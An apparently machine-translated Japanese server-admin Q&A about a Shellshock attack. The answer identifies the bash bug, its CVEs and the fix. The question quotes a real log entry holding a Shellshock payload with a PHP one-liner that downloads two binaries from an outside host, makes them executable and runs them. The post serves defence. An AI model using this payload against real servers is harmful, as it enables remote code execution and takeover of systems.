ウェブサーバーのユーザーによって実行されたバイナリを発見しました/tmp/susu1
。/tmp/susu2
ログには次のエントリがあります:
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
しかし、そのようなリクエストのエラー コード 301、302、403、404、500 しか見つかりませんでした。ハッキングが成功したことを示す 200er コードは見つかりませんでした。
これは一般的なセキュリティ問題ですか? どうすれば修正できますか? または、さらに追跡するにはどうすればよいでしょうか?
答え1
これはシェルショック攻撃のようです。2014 年 9 月 24 日に bash がこのバグの修正をリリースしたときに初めて発表されました。
最初のバグは、環境変数の値に格納されている関数定義の末尾にコマンドが連結されている場合に、Bash が意図せずコマンドを実行する原因となります。1[6] この発表から数日後、根本的な設計上の欠陥を徹底的に調査した結果、さまざまな関連する脆弱性(CVE-2014-6277、CVE-2014-6278、CVE-2014-7169、CVE-2014-7186、CVE-2014-7187)が発見され、Ramey氏は一連の追加パッチでこれに対処しました。
システムが脆弱かどうかは、以下の説明に従って確認できます。サーバーが ShellShock バグに対して脆弱かどうかをテストするにはどうすればよいでしょうか?
この問題を解決するには、システムまたは少なくとも Bash バージョンを更新する必要があります。